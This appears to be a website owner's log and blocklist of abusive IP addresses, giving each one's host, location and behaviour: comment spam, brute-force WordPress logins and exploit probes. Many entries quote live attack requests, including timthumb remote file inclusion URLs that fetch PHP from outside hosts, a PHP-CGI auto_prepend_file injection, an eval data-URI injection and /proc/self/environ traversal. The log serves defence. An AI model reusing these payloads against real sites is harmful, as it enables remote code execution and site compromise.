195.3.146.94 Company: Latvia – Riga Rn Data Sia
198.245.63.218 Hostname: ns4000889.ip-198-245-63.net
Company: Canada – Montreal Ovh Hosting Inc.
Website server: 2 websites: onenetwork.net.au , sbgrd.com
Comment spammer
Bad host
192.69.90.202 Company: United States – Scranton Volumedrive Comment spammer
Listed in Project Honeypot – Dictionary Attacker
195.3.146.94 Company: Latvia – Riga Rn Data Sia Trying to login to WordPress admin
Reported in Project Honeypot as hacker looking for vulnerabilities
173.254.216.66 Hostname: exit-01a.noisetor.net
Company: United States – Los Angeles Noisebridge
OC3-NETWORKS-AS-NUMBER Web Africa Proxy aut-num object
Comment spammer
50.22.36.34 Hostname: 50.22.36.34-static.reverse.softlayer.com
Company: United States – Dallas Softlayer Technologies Inc.
Shared hosting server: 59 websites
Looking for exploits:
stp/admin/index.php
/cgi-bin/te/login.cgi
/cgi-bin/te/wlogin.cgi
/te3/signup.php
188.165.155.249 Company: France – Roubaix Ovh Systems Comment spammer
67.212.164.188 Hostname: node05.tmdvps.com
Company: United States – Chicago Singlehop Inc.
Shared hosting server: 96 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Real-Estate-v1.3/thumb.php?src=http:
//flickr.com.tr.realityinformatica.com/bad.php
37.59.209.228 Company: France – Roubaix Ovh Systems Trying to login/register
Bad Host
88.146.225.36 Hostname: 88-146-225-36.amigonet.cz
Company: Czech Republic – Usti Nad Labem Amigonet S.r.o. Usti Nad Labem
looking for non-existent URLs
URL//sfdsfsdfsd
Honeypot listing: Mail server and Dictionary attacker
188.138.143.93 Hostname: 188-138-143-93.starnet.md
Company: Moldova, Republic Of – Chisinau Starnet S.r.l
Trying to login/register
/wp-login.php?action=register
/signup.php
/login.php
144.76.60.181 Hostname: static.181.60.76.144.clients.your-server.de
Company: Germany – Berlin Server Block
Malicious User Agent detected:
python-requests/1.1.0 CPython/2.7.3 Linux/3.2.0-39-generic
90.223.205.65 Hostname: 5adfcd41.bb.sky.com
Company: United Kingdom – London Sns Addresses
looking for Java scripts
looking for non-existent paths
Malicious User Agent: Java/1.4.1_04
50.115.173.173 Company: United States – Kansas City Dnsslave.com
Website server: 1 website: christianlouboutinpasvcher.com
Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02
Bork-edition [en]
162.211.122.2 Company: United States – Lewes Ilika.net Llc Comment Spammer
216.156.103.42 Hostname: 216.156.103.42.ptr.us.xo.net
Company: United States – New York City Xo Communications
Bad Behaviour detected:
1. Abuse of Digg share script
/\’+encodeURIComponent(location.href)+\’&title=\’+encodeURIComponent(document.title),%20\’digg\’,\’toolbar=no,width=1020,height=600\’);%20return%20false;
Multiple violations
2. DOMAIN/this.options
208.87.233.180 Hostname: webdefence.cluster-g.websense.net
Company: United States – Anchorage Surfcontrol Inc.
Comment Spammer
37.1.222.114 Company: Germany Berlin 3nt Solutions Llp
AS28753 LEASEWEB-DE Leaseweb Germany GmbH
THIS IS A HACKER the IP MUST BE BANNED
Successfully hacked a GoDaddy server and at least one hosted website this year with a base64_eval code injection attack.
The script allowed the hacker FTP access to the server, and to upload a file to WordPress /wp-admin/includes giving him FTP access to the site.
The hacker repeatedly used the FTP access to reload his modified WordPress template files.
He had access to the MySQL database, allowing him to reset the database to one with his code, at will.
We identified this IP as at least one of the IPs in use when the hacker returned yesterday looking for his script file.
37.9.53.50 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd.
Website server: 1 website – crazzyunix.com
Looking for vulnerabilities
/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
83.149.48.74 Russian Federation – Kemerovo Cjsc Mobicom-novosibirsk Network Brute Force dictionary attack on wp-login.php
83.149.21.217 Russian Federation – Kazan Ojsc Mss-povolzhe Network Brute Force dictionary attack on wp-login.php
91.105.164.173 Hostname: host-91-105-164-173.bbcustomer.zsttk.net
Company: Russian Federation – Novosibirsk Jsc Zap-sib Transtelecom Novosibirsk
Brute Force dictionary attack on wp-login.php
197.251.175.178 Company: Ghana – Accra Vodafone Ghana Adsl Dhcp Pool Ip Addresses Brute Force dictionary attack on wp-login.php
189.139.102.243 Hostname: dsl-189-139-102-243-dyn.prod-infinitum.com.mx
Company: Russian Federation – Arkhangel’sk Jsc North-west Telecom Arkhangelsk Branch
Brute Force dictionary attack on wp-login.php
92.101.112.8 Hostname: ip-008-112-101-92.pools.atnet.ru
Company: Mexico – Mexico City Gestion De Direccionamiento Uninet
Brute Force dictionary attack on wp-login.php
188.114.21.120 Hostname: 120.21.114.188.donpac.ru
Company: Russian Federation – Rostov-na-donu Ojsc Rostelecom Macroregional Branch South
Brute Force dictionary attack on wp-login.php
62.249.146.118 Company: Russian Federation – Khabarovsk Transtelecom-dv Brute Force dictionary attack on wp-login.php
197.205.62.33 Company: Algeria – Algiers Adresses Dynamic Setif Brute Force dictionary attack on wp-login.php
41.223.160.234 Company: Sudan – Khartoum Mtn Sudan Brute Force dictionary attack on wp-login.php
95.54.181.62 Hostname: pppoe.95-54-181-62.dynamic.murmansk.avangarddsl.ru
Company: Russian Federation – Saint Petersburg Ojsc North-west Telecom
Brute Force dictionary attack on wp-login.php
105.239.149.111 Company: Sudan – Khartoum Zain Sd 2g 3g Lte Apn Internet Pool 2 Ark Brute Force dictionary attack on wp-login.php
37.123.32.188 Company: Turkey – Istanbul Metronet Iletisim Teknoloji A.s. Brute Force dictionary attack on wp-login.php
189.132.223.185 Hostname: dsl-189-132-223-185-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Gestion De Direccionamiento Uninet
Hacker looking for vulnerabilities
Multiple violations:
1. Trying to access wp-config files:
/wp-config.old
/wp-config.orig
/wp-config.original
/wp-config.php.bak
/wp-config.php.save
/wp-config.php.swo
2. Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/d5-business-line/assets/js/thumb.php
/wp-content/themes/d5-business-line/classes/timthumb.php
/wp-content/themes/d5-business-line/classes/thumb.php
/wp-content/themes/d5-business-line/core/libs/thumbnails/timthumb.php
/wp-content/themes/d5-business-line/cores/thumbnails/thumb.php
/wp-content/themes/d5-business-line/extensions/auto-thumb/timthumb.php
/wp-content/themes/d5-business-line/functions/timthumb.php
Attack continued for several minutes – logged over 100 403 errors
50.87.144.61 Hostname: gator3042.hostgator.com
Company: United States – Provo Unified Layer
Shared hosting server: 535 websites
PHP eval script injection attack:
/?page=data:,%3C?php%20eval($_GET[a]);%20?%3E&dir=data:
,%3C?php%20eval($_GET[a]);%20?%3E&file=data:,%3C?php
%20eval($_GET[a]);%20?%3E&asc=data:,%3C?php%20eval(
$_GET[a]); ….. m=data:,%3C?php%20eval($_GET[a]);
%20?%3E&a=print-439573653*57;
94.242.237.80 Company: Luxembourg – Steinsel Root Sa Comment spammer
14.139.59.54 Hostname: cazri.res.in
Company: India – Jodhpur Central Arid Zone Research Institute Jodhpur
Website server: 1 website – cazri.res.in
Comment spammer / Harvester
82.222.233.130 Company: Turkey – Izmit Tellcom Fiber Dynamic DDoS Brute Force / Dictionary Attack on wp-login.php
85.110.37.122 Hostname: 85.110.37.122.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
DDoS Attack on WordPress admin
/administrator/index.php
/index.php?option=com_user&task=completereset
192.69.90.208 Company: United States – Scranton Volumedrive Comment spammer
209.239.112.162 Hostname: falcon370.server4you.net
Company: Brazil – Saint Louis Hosting Solutions International Inc.
Shared hosting server: 21 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/newoffer/timthumb.php?src=http %3A%2F%2F
picasa.com.rodrigorigoni.com.br%2Fsimple.php
88.190.47.234
88.190.61.100
Hostname: 88-190-47-234.rev.dedibox.fr
Company: France – Lyon Free Sas
Comment spammer
82.83.51.31 Hostname: dslc-082-083-051-031.pools.arcor-ip.net
Company: Germany – Bochum Arcor Ag
Malicious user agent:
PEAR HTTP_Request class ( http: //pear.php.net/ )
50.118.202.184 Company: United States – San Jose Possum Bilities WordPress trackback spammer
186.202.126.26 Hostname: pleskcl0024.hospedagemdesites.ws
Company: Brazil – Rio Branco Locaweb Servicos De Internet S/a
Shared hosting server: 159 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
46.105.103.9 Hostname: ns383149.ovh.net
Company: France – Roubaix Ovh Systems
Shared hosting server: 20 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
URL/&sa=U&ei=ar3TUfrWNMOQiQLsh4G4Ag&ved=
0CBgQFjAA&usg=AFQjCNG8Ka1WaFPEr8htFW6Ur8ViVZ5h7g
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.golfpops.com/good.php
198.57.231.71 Hostname: sma.smahosting.com
Company: United States – Provo Unified Layer
Shared hosting server: 123 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
URL/&sa=U&ei=ar3TUfrWNMOQiQLsh4G4Ag&ved=
0CBgQFjAA&usg=AFQjCNG8Ka1WaFPEr8htFW6Ur8ViVZ5h7g
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.golfpops.com/good.php
94.41.160.75 Hostname: host-94-41-160-75.unknown.o56.ru
Company: Russian Federation – Orenburg Ojsc Ufanet
Comment Spammer
91.207.116.193 Company: Ukraine – Kharkiv Rise-v Ltd Comment Spammer
94.27.80.230 Hostname: SOL-FTTB.230.80.27.94.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
192.95.18.239 Company: United States – Newark Ovh Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02
Bork-edition [en]
94.27.64.123 Hostname: SOL-FTTB.123.64.27.94.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
188.65.209.166 Hostname: host-188.65.209.166.knopp.ru
Company: Russian Federation – Moscow Limited Liability Company Knopp
Website server: 2 websites – isbtechno.ru uhappy.ru
HACKER – Multiple violations:
Looking for vulnerabilities:
/wp-includes/jahat.php
/wp-includes/class-wp-customize-client.php
wp-includes/wp-script.php
/logx.txt
c.txt
x.txt
Brute Force Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/patientpuptraining/thumb.php?src=http
%3A%2F%2Fpastoralvocacional.cnbb.org.br%2Fbad.php
86.58.171.67 Company: Denmark – Glostrup Jay.net A/s
Shared hosting server: 35 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb.php?src=http
%3A%2F%2Fflickr.com.sohbetblog.tk%2Fxp.php
204.13.248.119 Hostname: site-redirect.dyndns.com
Company: United States – Manchester Dynamic Network Services Inc.
Shared hosting server: 314 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http
%3A%2F%2Fpicasa.com.produitsnaturelsgammaforce.com/kikok.php
206.214.215.95 Hostname: vps.ravienergie.com
Company: United States – Warren Ravi Energie Inc.
Website server: ravienergie.com – This server/website is hacked
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http
%3A%2F%2Fwordpress.com.atexpress.com.ve%2Fcpx.php
108.163.128.171 Company: Poland – Gdynia Static Ip DOMAIN/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation
%3d1+-d+disable_functions%3d”+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp:
//51zyzg.com/1.txt+-n
207.177.17.150 Hostname: 150.17.177.207.dyn.southslope.net
Company: United States – North Liberty South Slope Cooperative Telephone Company
RFI (Remote File Inclusion) attempt
DOMAIN/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation
%3d1+-d+disable_functions%3d%27%27+-d+open_basedir%3dnone+-d+auto_prepend_file
%3dhttp: //51zyzg.com/1.txt+-n
198.20.175.42 Company: United Kingdom Darlington Valuevps Hacker trying base64 attack with very long encoded strings
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]
plus about 400 more bits in strings
173.208.2.33 Hostname: 173.208.2.33.rdns.ubiquityservers.com
Company: United States – Chicago Ubiquity Server Solutions Chicago
Trying to login and add content:
/member/newarticle.php
/member/login.php
85.88.37.203 Hostname: da.hostbase.eu
Company: Belgium – Brussels Eusip Bvba
Shared hosting server: 26 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
188.240.134.125 Company: Romania – Iasi Sc Eurocris Impex Srl Comment spammer
188.240.128.0 – 188.240.143.255 Company: Romania – Iasi Sc Eurocris Impex Srl Banned region: Romania
88.190.47.233 Hostname: 88-190-47-233.rev.dedibox.fr
Company: France – Paris Free Sas
Comment spammer
142.91.81.87 Hostname: 142.91.81.87.rdns.ubiquity.io
Company: United States – Dallas Ubiquity Server Solutions Dallas
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
193.180.119.113 Company: Poland – Tarnowskie Gory Livenet Sp. Z O.o. Malicious User Agents:
PHP/5.2.10
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Known Rule Breaker (Project Honeypot)
193.180.119.0 – 193.180.119.255 Company: Sweden – Stockholm Proxy Services Bad host
Proxy service – Proxy services are banned
108.163.128.171 Company: Canada Montreal Iweb Ne R017 01s
Website server – 3 websites: alagoinhasnoticias.com.br ba360graus.com.br revistaautomotiva.com.br
Hacker attempting Remote File Injection
/cart.php?a=byroe&templatefile=../../../configuration.php%00
Canadian IP hosting Brazilian websites
91.238.134.174 Hostname: hosted-by.slaskdatacenter.pl
Company: Poland – Tarnowskie Gory Livenet Sp. Z O.o.
Hacker trying to access site admin
/admin/
/cncat_add.php
/dodaj-wpis
/dodaj
188.190.98.18 Hostname: hosted-in.infiumhost.com
Company: Ukraine – Kharkiv Infium Ltd
Hacker trying to inject base64 code
DOMAIN/phppath/php/%70%68%70%70%61%74%68/%70%68%70?%2D%64+ etc…
188.190.96.0 – 188.190.127.255 Company: Ukraine – Kharkiv Infium Ltd Banned region: Ukraine
100.43.64.0 – 100.43.95.255 Company: Russian Federation Moscow Yandex Inc Banned search engine: Yandex
172.245.209.136 Hostname: vps.ubuymeds.nett
Company: United States – Buffalo Colocrossing (ColoCrossing)
Shared hosting server: 61 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
206.214.211.228 Hostname: vps.ubuymeds.nett
Company: United States – New York City Killa Beatz Inc
Website server: killabeatzland.com
Remote File Inclusion attempt / WordPress GD Star ratings plugin RFI exploit:
/wp-content/gd-star-rating/?src=http %3A%2F%2Fpisca.com.filmeonlinehd.net/kikok.php
105.236.62.245 Hostname: 105-236-62-245.access.mtnbusiness.co.za
Company: South Africa Johannesburg Mtn Business Solutions (pty) Ltd
Looking for indexes:
URL/_index.html
193.234.166.22 Company: Sweden – Stockholm Proxy Services Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
87.23.60.186 Hostname: host186-60-static.23-87-b.business.telecomitalia.it
Company: Italy Venice Telecom Italia Net
WordPress exploit attempt / Known SQL injection vulnerability in ripe-hd-player plugin
/wp-content/plugins/ripe-hd-player/config.php?id=-3
189.238.86.228 Hostname: dsl-189-238-86-228-dyn.prod-infinitum.com.mx
Company: Mexico Mexico City Uninet S.a. De C.v.
RFI (Remote File Inclusion) attempt
/phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+
disable_functions%3d”+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp:
//51zyzg.com/1.txt+-n
83.219.133.32 Hostname: ppp-static8-32.tis-dialog.ru
Company: Russian Federation – Kaliningrad Tis Dialog Llc
Comment spammer
Tried to login/register on restricted website
looking for forums and anywhere else a post form may exist
83.219.131.0 – 83.219.137.255 Russian Federation – Kaliningrad Tis Dialog Llc Banned region: Russian Federation
208.89.208.161 Company: United States – Kansas City Dnsslave.com Tried to login/register on restricted website
Multiple attempts
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
198.2.203.17 Company: United States – Sunnyvale Peg Tech Inc Comment spammer
Tried to brute force the comment form
e.g: /comment/reply/192++++++++++++++++++++++++
Result:+chosen+nickname+%22ncxdthdja%22;+captcha+
recognized;+nofollow+is+found;+success+-+posted+
to+first+encountered+partition+%22/blog%22;+BB-
code+not+working;
Bad host: Peg Tech Inc
83.15.227.34 Hostname: eop34.internetdsl.tpnet.pl
Company: Poland – Gdynia Static Ip
Comment spammer / Dictionary attacker
Tried to login/register on restricted website
/administrator/index.php
/wp-login.php
/?q=user
/admin.php
95.167.218.226 Company: Russian Federation – Moscow Ojsc Rostelecom Comment spammer
95.167.0.0 – 95.167.255.255 Company: Russian Federation – Moscow Ojsc Rostelecom Banned region: Russian Federation
142.91.79.14 Hostname: 142.91.79.14.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment spammer
Tried to login/register on restricted website
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
108.62.82.147 Hostname: optimization.myconsumerreward.net
Company: United States – Chicago Ubiquity Server Solutions Chicago
Comment spammer
Tried to login/register on restricted website
174.74.52.35
Hostname: ip174-74-52-35.om.om.cox.net
Company: United States – Omaha Cox Communications
Website server: wigodsky.net
Seen without any user agent.
Seems to be pinging the site – no pages ever loaded
Classed as Rule Breaker in Project Honeypot
Bad host: Cox Communications
130.255.31.178 Company: United Kingdom – Weston On The Green Satellite Solutions Worldwide Ltd
Website: http: //www.satellitesolutionsworldwide.com/
Bad bot:
Crawled entire website in less than 1 minute using 174 different User Agent IDs
50.115.166.128
50.115.167.177
Company: United States – Kansas City Dnsslave.com Comment spammer, Mail server / Trackback spammer
Hijacked browser UA:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET
CLR 1.1.4322; PeoplePal 6.2)
50.117.49.108 Company: United States – San Jose Yan Server Company – Feng Yong Comment spammer
198.100.144.229 Hostname: debill.corbina.com.ua
Company: Canada – Montreal Ovh Hosting Inc.
Looking for indexes
/index.php
198.100.144.0 – 198.100.159.255 Company: Canada – Montreal Ovh Hosting Inc. Bad host: Montreal Ovh Hosting Inc.
87.110.0.0 – 87.110.127.255 Company: Latvia – Riga Address Pool For Ltc-home Customers Banned region: Latvia
93.170.13.212 Company: Netherlands – Amsterdam Alfa Telecom S.r.o. Comment spammer
Trying to add page: node/add
199.119.181.232 Company: United States – Orlando Infinitum Technologies Inc.
Shared hosting server: 51 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http:
//flickr.com.golfpops.com/good.php
142.91.79.14 Hostname: 142.91.79.14.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Tried to login/register on restricted website
Seen with 2 user agents:
Malicious UA: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Suspected mail.ru tool:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157);
.NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)
151.237.177.86 Company: Sweden – Stockholm Deepak Mehta Fie Trackback/pingback spammer
Posting fake trackback links to www DOT VtJt5H DOT net
151.237.177.0 – 151.237.177.255 Company: Sweden – Stockholm Deepak Mehta Fie Bad host: Deepak Mehta Fie
37.59.209.228 Company: France – Roubaix Ovh Systems Trackback/pingback spammer
Posting fake trackback links to www DOT iSKLR68T0 DOT org
37.59.209.231 Company: France – Roubaix Ovh Systems Trackback/pingback spammer
Posting fake trackback links to www DOT 06Eek DOT net
23.82.106.20 Company: United States – Nobis Technology Group Llc Comment Spammer
198.27.64.0 – 198.27.127.255 Canada Montreal Ovh Hosting Inc. Bad host: Montreal Ovh Hosting Inc.
67.202.113.195 Hostname: debill.corbina.com.ua
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
88.81.224.0 – 88.81.255.255 Hostname: debill.corbina.com.ua
Company: Ukraine – Kiev Top Net Pjsc
Banned region: Ukraine
88.81.246.238 Hostname: debill.corbina.com.ua
Company: Ukraine – Kiev Top Net Pjsc
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
174.128.227.98 Company: United States – Cleveland Sharktech.
Website server: ybzssm.com
/&sa=U&ei=ef7EUfvCFYPEPdnsgcgL&ved=0CMUCEBYwWzhk&usg=AFQjCNEjzkRd-
IFn1–X3I9EezcvurZteg///?controller=../../../../../../../../../../../../../../../../../../../..
/../../../../proc/self/environ%0000&option=com_frontenduseraccess
193.235.43.235 Company: Sweden – Stockholm Proxy Services Trying to register on restricted site
142.4.98.162 Company: United States San Jose Peg Tech Inc
PEGTECHINC – PEG TECH INC
Comment spammer
Using very long requests:
URL+%5BPLM=0%5D%5BN%5D+GET+URL+%5B0,48305,5642%5D+-%3E+%5BN%5D
+POST+URL/comment/reply/184+%5B0,0,46026%5D+-%3E+%5BN%5D+GET+URL+
%5B0,0,59504%5D+-%3E
142.4.96.0 – 142.4.127.255 Company: United States San Jose Peg Tech Inc
PEGTECHINC – PEG TECH INC
Bad host: San Jose Peg Tech Inc
94.202.205.200 Company: United Arab Emirates – Dubai Emirates Integrated Telecommunications Company Pjsc Hacker/Spammer:
Looking for indexes – URL/index.php
94.202.204.0 – 94.202.207.255 Company: United Arab Emirates – Dubai Emirates Integrated Telecommunications Company Pjsc Host banned /Traffic from Dubai banned
195.128.174.115 Hostname: web15.talkactive.net
Company: Denmark – Copenhagen Talk Active Aps
Shared hosting server IP: 423 websites
Brute force attack attempted – wpOnlineStore/osCommerce/Zencart exploit:
URL&sa=U&ei=mznGUbX7K46qOtSPgJgI&ved=0CMQBEBYwNA&usg=
AFQjCNG-xUhm1POEe3qP8vLCv6I17J-B8A/admin/categories.php/login.php?cPath=
&action=new_product_preview/admin/categories.php/login.php?cPath=&action=
new_product_preview/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.217.202.28 Hostname: hostingland.ru
Company: Russian Federation – Novosibirsk Sviaz-service Ltd.
Shared hosting server IP: 297 websites
HACKER
Violation 1: Using GET request with extremely long queries:
URL/%22%20onmousedown=
%22return%20rwt(this,\’\’,\’\’,\’\’,\’112\’,\’AFQjCNEso5ON7mrYyRMnsFNyh4-sHqf2Yw\’,\’\’,\’
0CE8QFjALOGQ\’,\’\’,\’\’,event)%22%3EPlugins%20Archives%20%7C%20-%20***%20***%
20-%20****%3C/a%3E%3C/h3%3E%3Cdiv%20class=%22s%22%3E%3Cdiv%3E%3Cdiv%
20class=%22thb%20th%22%20style=%22height:44px;width:44px%22%3E%3Ca%20href=
%22/search
Violation 2: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/bueno
/timthumb.php?src= http %3A%2F%2Fflickr.com.danielcinelli.com%2Fread.php
91.217.202.0 – 91.217.202.255 Company: Russian Federation – Novosibirsk Sviaz-service Ltd. Banned region: Russian Federation
81.39.9.52 Hostname: 088156149007.stargardszczecinski.vectranet.pl
Company: Spain – Madrid Telefonica De Espana Sau
Looking for scripts
Looking for non-existent URLs
Malicious user agent: Java/1.7.0_25
88.156.149.7 Hostname: 088156149007.stargardszczecinski.vectranet.pl
Company: Poland – Szczecin Vectra S.a.
Comment Spammer
66.248.194.196 Company: United States – Dallas Joel Morris Trying to login with username jamelola
Trying to add content: /?q=node/add
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
174.128.227.98 Company: United States – Cleveland Sharktech
Website server: ybzssm.com
Hacker
///?option=com_frontenduseraccess&controller=../../../../../../../../../../../../../../../../../
../../../../../../../proc/self/environ%0000URL/&sa=U&ei=ef7EUfvCFYPEPdnsgcgL
&ved=0CMUCEBYwWzhk&usg=AFQjCNEjzkRd-IFn1–X3I9EezcvurZteg///?
option=com_frontenduseraccess&controller=../../../../../../../../../../../../../../../../../../..
/../../../../../proc/self/environ%0000
204.84.216.200 Company: United States – Holly Springs North Carolina Research And Education Network Comment spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
186.202.126.16 Hostname: pleskcl0019.hospedagemdesites.ws
Company: Brazil – Rio Branco Locaweb Servicos De Internet S/a
Shared hosting server IP: 186 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=http:
//picasa.com.ivanquerino.net/jos.php
188.143.234.127 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment spammer
Extremely high threat rating
188.143.234.0 – 188.143.234.255 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Banned region: Russian Federation
190.204.16.127 Hostname: 190-204-16-127.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Hotlinking
Banned region: Venezuela
199.19.249.196 Company: United States – Sunnyvale Blue Coat Systems Inc
Website server: tnschulungszentrum.de
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727;
.NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
199.19.248.0 – 199.19.255.255 Company: United States – Sunnyvale Blue Coat Systems Inc Bad Host
Spy bots
199.80.54.252 Hostname: c-n150-u1162-252.webazilla.com
Company: United States – Palo Alto Wz Communications Inc.
Malicious user agent detected:
Python-urllib/2.6
142.4.117.161 Company: United States – San Jose Jiusutechnology Limited Liability Company
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host: PEG TECH INC
142.4.117.160 – 142.4.117.167 Company: United States – San Jose Jiusutechnology Limited Liability Company
PEGTECHINC – PEG TECH INC
Bad host: PEG TECH INC
142.4.117.0 – 142.4.117.255 PEGTECHINC – PEG TECH INC Bad host: PEG TECH INC
151.237.191.253 Company: United States – Asheville Deepak Mehta Fie Comment spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
Bad host: Deepak Mehta Fie
216.224.169.48 Hostname: servidor.tideagro.com
Company: United States – Grass Valley Softcom America Inc.
Shared hosting server IP: 7 websites
Suspected hacker
Bad requests including code characters and wp-sample.php in lookup
/&sa=U&ei=OgjCUbHbFsy3hAe5uYC4Cw&ved=0CGQQFjAX&usg=AFQjCNF0Jr_l4T5eNcHArY-h-
hfHlgsb1w//wp-sample.phpURL//wp-sample.php/&sa=U&ei=NPLBUYL4Ho78qQGX0ICADw&ved=
0CKwCEBYwWg&usg=AFQjCNEHoWkX6Uoviiyqa_5IP6sboXsC-g//wp-sample.php
142.4.213.179 Hostname: ns4004225.ip-142-4-213.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment spammer – high threat rating (52) in Project Honeypot
142.4.192.0 – 142.4.223.255 Company: Canada – Montreal Ovh Hosting Inc. Bad host: Montreal Ovh Hosting Inc.
216.218.250.151 Hostname: pluto-we7.initsoft.com
Company: United States – Santa Clara Bigbiz Internet Services
Shared hosting server IP: 15 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
68.68.99.219 Company: United States – Sunnyvale Prgmr.com Inc. Trying to login with user name Adam342, trying to add post, bad look-up request
/index.php?usr_login=Adam342&btn_submit=Find&t=finduser
/viewmember?member=Adam342
/add_story.php
/search.php/all/Best%20website%20for%20quality%20game%20cheats%21
Listed as Comment Spammer in Project Honeypot
190.61.5.12 Hostname: ws07.host4g.com
Company: Argentina – Buenos Aires Ifx Networks Argentina S.r.l.
Shared hosting server IP: 771 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Quadro/timthumb.php?src=http%3A%2F%2Fdollsonmission.net%2Fyoutube.php
75.136.30.152 Hostname: 75-136-30-152.static.jcsn.tn.charter.com
Company: United States – Jackson Charter Communications
Comment spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
100.43.83.149 Company: Russian Federation – Moscow Yandex Inc Bad bot: YandexImages/3.0
Rule breaker. Ignores robots.txt
100.43.64.0 – 100.43.95.255 Company: Russian Federation – Moscow Yandex Inc
65.55.213.247 Hostname: msnbot-65-55-213-247.search.msn.com
Company: United States – Bristow Microsoft Corp
Rule Breaker
Read robots.txt (bot disallowed)
Then immediately looked for (non-existent) URL
199.30.20.16 Hostname: msnbot-199-30-20-16.search.msn.com
Company: United States – New Port Richey Microsoft Corp
Rule Breaker / bad bot
Read robots.txt (bot and .jpg disallowed)
Then immediately crawled image folder looking for .jpg files
37.59.87.44 Company: France – Roubaix Ovh Systems Comment Spammer
